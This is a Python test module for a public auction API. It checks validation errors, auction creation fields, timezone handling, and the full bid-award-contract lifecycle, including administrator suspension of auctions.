response = self.app.post_json(request_path, {'data': {'enquiryPeriod': {'endDate': '9999-12-31T23:59:59.999999'}, 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u'date value out of range']}, u'location': u'body', u'name': u'enquiryPeriod'}
])
self.initial_data['tenderPeriod'] = self.initial_data.pop('auctionPeriod')
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['auctionPeriod'] = self.initial_data.pop('tenderPeriod')
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'startDate': [u'This field is required.']}, u'location': u'body', u'name': u'auctionPeriod'}
])
self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2014-10-01T00:00:00'}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data.pop('tenderPeriod')
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'startDate': [u'period should begin before its end']}, u'location': u'body', u'name': u'tenderPeriod'}
])
#data = self.initial_data['tenderPeriod']
#self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2015-10-01T00:00:00'}
#response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
#self.initial_data['tenderPeriod'] = data
#self.assertEqual(response.status, '422 Unprocessable Entity')
#self.assertEqual(response.content_type, 'application/json')
#self.assertEqual(response.json['status'], 'error')
#self.assertEqual(response.json['errors'], [
#{u'description': [u'period should begin after enquiryPeriod'], u'location': u'body', u'name': u'tenderPeriod'}
#])
now = get_now()
#self.initial_data['awardPeriod'] = {'startDate': now.isoformat(), 'endDate': now.isoformat()}
#response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
#del self.initial_data['awardPeriod']
#self.assertEqual(response.status, '422 Unprocessable Entity')
#self.assertEqual(response.content_type, 'application/json')
#self.assertEqual(response.json['status'], 'error')
#self.assertEqual(response.json['errors'], [
#{u'description': [u'period should begin after tenderPeriod'], u'location': u'body', u'name': u'awardPeriod'}
#])
data = self.initial_data['auctionPeriod']
self.initial_data['auctionPeriod'] = {'startDate': (now + timedelta(days=15)).isoformat(), 'endDate': (now + timedelta(days=15)).isoformat()}
self.initial_data['awardPeriod'] = {'startDate': (now + timedelta(days=14)).isoformat(), 'endDate': (now + timedelta(days=14)).isoformat()}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['auctionPeriod'] = data
del self.initial_data['awardPeriod']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'period should begin after auctionPeriod'], u'location': u'body', u'name': u'awardPeriod'}
])
#
# data = self.initial_data['minimalStep']
# self.initial_data['minimalStep'] = {'amount': '1000.0'}
# response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
# self.initial_data['minimalStep'] = data
# self.assertEqual(response.status, '422 Unprocessable Entity')
# self.assertEqual(response.content_type, 'application/json')
# self.assertEqual(response.json['status'], 'error')
# self.assertEqual(response.json['errors'], [
# {u'description': [u'value should be less than value of auction'], u'location': u'body', u'name': u'minimalStep'}
# ])
#
# data = self.initial_data['minimalStep']
# self.initial_data['minimalStep'] = {'amount': '100.0', 'valueAddedTaxIncluded': False}
# response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
# self.initial_data['minimalStep'] = data
# self.assertEqual(response.status, '422 Unprocessable Entity')
# self.assertEqual(response.content_type, 'application/json')
# self.assertEqual(response.json['status'], 'error')
# self.assertEqual(response.json['errors'], [
# {u'description': [u'valueAddedTaxIncluded should be identical to valueAddedTaxIncluded of value of auction'], u'location': u'body', u'name': u'minimalStep'}
# ])
#
# data = self.initial_data['minimalStep']
# self.initial_data['minimalStep'] = {'amount': '100.0', 'currency': "USD"}
# response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
# self.initial_data['minimalStep'] = data
# self.assertEqual(response.status, '422 Unprocessable Entity')
# self.assertEqual(response.content_type, 'application/json')
# self.assertEqual(response.json['status'], 'error')
# self.assertEqual(response.json['errors'], [
# {u'description': [u'currency should be identical to currency of value of auction'], u'location': u'body', u'name': u'minimalStep'}
# ])
#
# auction_data = deepcopy(self.initial_data)
# auction_data['value'] = {'amount': '100.0', 'currency': "USD"}
# auction_data['minimalStep'] = {'amount': '5.0', 'currency': "USD"}
# response = self.app.post_json(request_path, {'data': auction_data}, status=422)
# self.assertEqual(response.status, '422 Unprocessable Entity')
# self.assertEqual(response.content_type, 'application/json')
# self.assertEqual(response.json['status'], 'error')
# self.assertEqual(response.json['errors'], [
# {u'description': [u'currency should be only UAH'], u'location': u'body', u'name': u'value'}
# ])
data = self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
del self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["procuringEntity"]["contactPoint"]["telephone"] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}}, u'location': u'body', u'name': u'procuringEntity'}
])
def create_auction_auctionPeriod(self):
data = self.initial_data.copy()
#tenderPeriod = data.pop('tenderPeriod')
#data['auctionPeriod'] = {'startDate': tenderPeriod['endDate']}
response = self.app.post_json('/auctions', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertIn('tenderPeriod', auction)
self.assertIn('auctionPeriod', auction)
self.assertNotIn('startDate', auction['auctionPeriod'])
self.assertEqual(parse_date(data['auctionPeriod']['startDate']).date(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).date())
if SANDBOX_MODE:
auction_startDate = parse_date(data['auctionPeriod']['startDate'], None)
if not auction_startDate.tzinfo:
auction_startDate = TZ.localize(auction_startDate)
tender_endDate = parse_date(auction['tenderPeriod']['endDate'], None)
if not tender_endDate.tzinfo:
tender_endDate = TZ.localize(tender_endDate)
self.assertLessEqual((auction_startDate - tender_endDate).total_seconds(), 70)
else:
self.assertEqual(parse_date(auction['tenderPeriod']['endDate']).date(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).date())
self.assertGreater(parse_date(auction['tenderPeriod']['endDate']).time(), parse_date(auction['auctionPeriod']['shouldStartAfter'], TZ).time())
def create_auction_generated(self):
document = {
'id': '1' * 32,
'documentType': 'x_dgfAssetFamiliarization',
'title': u'\u0443\u043a\u0440.doc',
'accessDetails': 'access details',
'format': 'application/msword',
'datePublished': get_now().isoformat(),
'dateModified': get_now().isoformat(),
}
data = self.initial_data.copy()
data['documents'] = [document]
#del data['awardPeriod']
data.update({'id': 'hash', 'doc_id': 'hash2', 'auctionID': 'hash3'})
response = self.app.post_json('/auctions', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
for key in ['procurementMethodDetails', 'submissionMethodDetails']:
if key in auction:
auction.pop(key)
self.assertEqual(set(auction), set([
u'procurementMethodType', u'id', u'date', u'dateModified', u'auctionID', u'status', u'enquiryPeriod',
u'tenderPeriod', u'minimalStep', u'items', u'value', u'procuringEntity', u'next_check',
u'procurementMethod', u'awardCriteria', u'submissionMethod', u'title', u'owner', u'auctionPeriod',
u'tenderAttempts', u'auctionParameters', u'bankAccount', u'registrationFee', u'lotIdentifier'
]))
self.assertNotEqual(data['id'], auction['id'])
self.assertNotEqual(data['doc_id'], auction['id'])
self.assertNotEqual(data['auctionID'], auction['auctionID'])
# Check all field of document in post data appear in created auction
def create_auction(self):
response = self.app.get('/auctions')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
response = self.app.post_json('/auctions', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
if self.initial_organization == self.test_financial_organization:
self.assertEqual(set(auction) - set(self.initial_data), set([
u'id', u'dateModified', u'auctionID', u'date', u'status', u'procurementMethod',
u'awardCriteria', u'submissionMethod', u'next_check', u'owner', u'enquiryPeriod', u'tenderPeriod',
u'minimalStep'
]))
else:
self.assertEqual(set(auction) - set(self.initial_data), set([
u'id', u'dateModified', u'auctionID', u'date', u'status', u'procurementMethod',
u'awardCriteria', u'submissionMethod', u'next_check', u'owner', u'enquiryPeriod', u'tenderPeriod',
u'minimalStep'
]))
self.assertIn(auction['id'], response.headers['Location'])
response = self.app.get('/auctions/{}'.format(auction['id']))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(set(response.json['data']), set(auction))
self.assertEqual(response.json['data'], auction)
response = self.app.post_json('/auctions?opt_jsonp=callback', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/javascript')
self.assertIn('callback({"', response.body)
response = self.app.post_json('/auctions?opt_pretty=1', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
response = self.app.post_json('/auctions', {"data": self.initial_data, "options": {"pretty": True}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
auction_data = deepcopy(self.initial_data)
auction_data['guarantee'] = {"amount": 100500, "currency": "USD"}
response = self.app.post_json('/auctions', {'data': auction_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
data = response.json['data']
self.assertIn('guarantee', data)
self.assertEqual(data['guarantee']['amount'], 100500)
self.assertEqual(data['guarantee']['currency'], "USD")
def check_daylight_savings_timezone(self):
data = deepcopy(self.initial_data)
ua_tz = pytz.timezone('Europe/Kiev')
response = self.app.post_json('/auctions', {'data': data})
timezone_before = parse_date(response.json['data']['tenderPeriod']['endDate']).astimezone(tz=ua_tz)
timezone_before = timezone_before.strftime('%Z')
now = get_now()
list_of_timezone_bools = []
# check if DST working with different time periods
for i in (10, 90, 180, 210, 240):
data.update({
"auctionPeriod": {
"startDate": (now + timedelta(days=i)).isoformat(),
}})
response = self.app.post_json('/auctions', {'data': data})
timezone_after = parse_date(response.json['data']['tenderPeriod']['endDate']).astimezone(tz=ua_tz)
timezone_after = timezone_after.strftime('%Z')
list_of_timezone_bools.append(timezone_before != timezone_after)
self.assertTrue(any(list_of_timezone_bools))
# AppraisalAuctionProcessTest
def first_bid_auction(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty auctions listing
response = self.app.get('/auctions')
self.assertEqual(response.json['data'], [])
# create auction
response = self.app.post_json('/auctions',
{"data": self.initial_data})
auction_id = self.auction_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering
self.set_status('active.tendering')
# create bid
self.app.authorization = ('Basic', ('broker', ''))
if self.initial_organization == self.test_financial_organization:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
else:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
bids_tokens = {bid_id: bid_token}
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
if self.initial_organization == self.test_financial_organization:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
else:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
bids_tokens[response.json['data']['id']] = response.json['access']['token']
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/auctions/{}/auction'.format(auction_id))
auction_bids_data = response.json['data']['bids']
# check bid participationUrl
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/bids/{}?acc_token={}'.format(auction_id, bid_id, bid_token))
self.assertIn('participationUrl', response.json['data'])
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/auctions/{}'.format(self.auction_id))
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
value_threshold = auction['value']['amount'] + auction['minimalStep']['amount']
now = get_now()
auction_result = {
'bids': [
{
"id": b['id'],
"date": (now - timedelta(seconds=i)).isoformat(),
"value": {"amount": value_threshold * 2},
}
for i, b in enumerate(auction_bids_data)
]
}
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
# get pending award
award = [i for i in response.json['data'] if i['status'] == 'pending'][0]
award_id = award['id']
# Upload rejectProtocol
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, award_id, doc_id, owner_token), {"data": {
"description": "rejection protocol",
"documentType": 'rejectionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'rejectionProtocol')
self.assertEqual(response.json["data"]["author"], 'auction_owner')
# set award as unsuccessful
response = self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
{"data": {"status": "unsuccessful"}})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
# get pending award
award2 = [i for i in response.json['data'] if i['status'] == 'pending'][0]
award2_id = award2['id']
self.assertNotEqual(award_id, award2_id)
# create first award complaint
# self.app.authorization = ('Basic', ('broker', ''))
# response = self.app.post_json('/auctions/{}/awards/{}/complaints?acc_token={}'.format(auction_id, award_id, bid_token),
# {'data': {'title': 'complaint title', 'description': 'complaint description', 'author': self.initial_organization, 'status': 'claim'}})
# complaint_id = response.json['data']['id']
# complaint_owner_token = response.json['access']['token']
# # create first award complaint #2
# response = self.app.post_json('/auctions/{}/awards/{}/complaints?acc_token={}'.format(auction_id, award_id, bid_token),
# {'data': {'title': 'complaint title', 'description': 'complaint description', 'author': self.initial_organization}})
# # answering claim
# self.app.patch_json('/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(auction_id, award_id, complaint_id, owner_token), {"data": {
# "status": "answered",
# "resolutionType": "resolved",
# "resolution": "resolution text " * 2
# }})
# # satisfying resolution
# self.app.patch_json('/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(auction_id, award_id, complaint_id, complaint_owner_token), {"data": {
# "satisfied": True,
# "status": "resolved"
# }})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
# get pending award
award = [i for i in response.json['data'] if i['status'] == 'pending'][0]
award_id = award['id']
# Upload auction protocol
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, award_id, doc_id, owner_token), {"data": {
"description": "auction protocol",
"documentType": 'auctionProtocol'
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
self.assertEqual(response.json["data"]["author"], 'auction_owner')
# set award as active
self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token), {"data": {"status": "active"}})
# get contract id
response = self.app.get('/auctions/{}'.format(auction_id))
contract_id = response.json['data']['contracts'][-1]['id']
# create auction contract document for test
response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
# after stand slill period
self.app.authorization = ('Basic', ('chronograph', ''))
self.set_status('complete', {'status': 'active.awarded'})
# time travel
auction = self.db.get(auction_id)
for i in auction.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(auction)
# sign contract
# Upload document
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/auctions/{}/contracts/{}/documents?acc_token={}'.format(self.auction_id, contract_id, owner_token),
params={
'data': {
'documentType': 'contractSigned',
'title': 'Signed contract',
'format': 'application/msword',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32
}
})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['title'], 'Signed contract')
self.assertEqual(response.json['data']['documentType'], 'contractSigned')
# Patch dateSigned field
signature_date = get_now().isoformat()
response = self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(
self.auction_id, contract_id, owner_token
), {"data": {"dateSigned": signature_date}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(auction_id, contract_id, owner_token), {"data": {"status": "active"}})
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}'.format(auction_id))
self.assertEqual(response.json['data']['status'], 'complete')
response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't add document in current (complete) auction status")
response = self.app.patch_json('/auctions/{}/contracts/{}/documents/{}?acc_token={}'.format(auction_id, contract_id, doc_id, owner_token), {"data": {"description": "document description"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) auction status")
response = self.app.put('/auctions/{}/contracts/{}/documents/{}?acc_token={}'.format(auction_id, contract_id, doc_id, owner_token), upload_files=[('file', 'name.doc', 'content3')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) auction status")
def auctionUrl_in_active_auction(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty auctions listing
response = self.app.get('/auctions')
self.assertEqual(response.json['data'], [])
# create auction
response = self.app.post_json('/auctions',
{"data": self.initial_data})
auction_id = self.auction_id = response.json['data']['id']
owner_token = response.json['access']['token']
# switch to active.tendering
response = self.set_status('active.tendering', {"auctionPeriod": {"startDate": (get_now() + timedelta(days=10)).isoformat()}})
self.assertIn("auctionPeriod", response.json['data'])
# create bid
self.app.authorization = ('Basic', ('broker', ''))
if self.initial_organization == self.test_financial_organization:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], 'qualified': True, 'eligible': True}})
else:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], 'qualified': True}})
# switch to active.qualification
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"id": auction_id}})
self.assertIn('auctionUrl', response.json['data'])
self.assertIn(auction_id, response.json['data']['auctionUrl'])
def suspended_auction(self):
self.app.authorization = ('Basic', ('broker', ''))
# empty auctions listing
response = self.app.get('/auctions')
self.assertEqual(response.json['data'], [])
# create auction
auction_data = deepcopy(self.initial_data)
auction_data['suspended'] = True
response = self.app.post_json('/auctions',
{"data": auction_data})
auction_id = self.auction_id = response.json['data']['id']
owner_token = response.json['access']['token']
self.assertNotIn('suspended', response.json['data'])
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], True)
self.assertNotIn('next_check', response.json['data'])
self.app.authorization = authorization
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], False)
self.assertIn('next_check', response.json['data'])
self.app.authorization = authorization
# switch to active.tendering
self.set_status('active.tendering')
# create bid
self.app.authorization = ('Basic', ('broker', ''))
if self.initial_organization == self.test_financial_organization:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
else:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
if self.initial_organization == self.test_financial_organization:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
else:
response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
{'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], True)
self.assertNotIn('next_check', response.json['data'])
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], False)
self.assertIn('next_check', response.json['data'])
self.app.authorization = authorization
# switch to active.auction
self.set_status('active.auction')
# get auction info
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/auctions/{}/auction'.format(auction_id))
auction_bids_data = response.json['data']['bids']
# check bid participationUrl
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/bids/{}?acc_token={}'.format(auction_id, bid_id, bid_token))
self.assertIn('participationUrl', response.json['data'])
# posting auction results
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/auctions/{}'.format(self.auction_id))
self.assertEqual(response.status, '200 OK')
auction = response.json['data']
value_threshold = auction['value']['amount'] + auction['minimalStep']['amount']
now = get_now()
auction_result = {
'bids': [
{
"id": b['id'],
"date": (now - timedelta(seconds=i)).isoformat(),
"value": {"amount": value_threshold * 2},
}
for i, b in enumerate(auction_bids_data)
]
}
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], True)
self.assertNotIn('next_check', response.json['data'])
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], False)
self.app.authorization = authorization
# set award as unsuccessful
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/auctions/{}/awards/{}/documents?acc_token={}'.format(self.auction_id, award_id, owner_token),
params={
'data': {
'documentType': 'rejectionProtocol',
'title': 'rejection protocol',
'format': 'application/msword',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32
}
})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['title'], 'rejection protocol')
self.assertEqual(response.json['data']['documentType'], 'rejectionProtocol')
response = self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
{"data": {"status": "unsuccessful"}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
# get awards
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
self.assertEqual(len(response.json['data']), 2)
self.assertEqual(response.json['data'][0]['status'], 'unsuccessful')
# get pending award
award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.assertNotEqual(award_id, award2_id)
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
doc_id = response.json["data"]['id']
response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(auction_id, award_id, doc_id, owner_token), {"data": {"documentType": 'auctionProtocol'}})
# set award as active
self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token), {"data": {"status": "active"}})
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], True)
self.assertNotIn('next_check', response.json['data'])
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], False)
self.app.authorization = authorization
response = self.app.patch_json(
'/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
{"data": {"status": "active"}},
status=403
)
self.assertEqual(response.json['errors'][0]['description'], "Can\'t update award in current (active) status")
# get contract id
response = self.app.get('/auctions/{}'.format(auction_id))
contract_id = response.json['data']['contracts'][-1]['id']
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], True)
self.assertNotIn('next_check', response.json['data'])
response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['suspended'], False)
self.app.authorization = authorization
# create auction contract document for test
response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
# after stand slill period
self.app.authorization = ('Basic', ('chronograph', ''))
self.set_status('complete', {'status': 'active.awarded'})
# time travel
auction = self.db.get(auction_id)
for i in auction.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(auction)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
# Upload document
response = self.app.post_json(
'/auctions/{}/contracts/{}/documents?acc_token={}'.format(self.auction_id, contract_id, owner_token),
params={
'data': {
'documentType': 'contractSigned',
'title': 'Signed contract',
'format': 'application/msword',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32
}
})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['title'], 'Signed contract')
self.assertEqual(response.json['data']['documentType'], 'contractSigned')
# Patch dateSigned field
signature_date = get_now().isoformat()
response = self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(
self.auction_id, contract_id, owner_token
), {"data": {"dateSigned": signature_date}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/auctions/{}/contracts/{}?acc_token={}'.format(auction_id, contract_id, owner_token),
{"data": {"status": "active"}}
)
self.assertEqual(response.json['data']['status'], 'active')
# check status
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/auctions/{}'.format(auction_id))
self.assertEqual(response.json['data']['status'], 'complete')
def move_draft_to_active_tendering(self):
data = self.initial_data.copy()
data['status'] = 'draft'
# Auction creation
response = self.app.post_json('/auctions', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['status'], 'draft')
auction_id = response.json['data']['id']
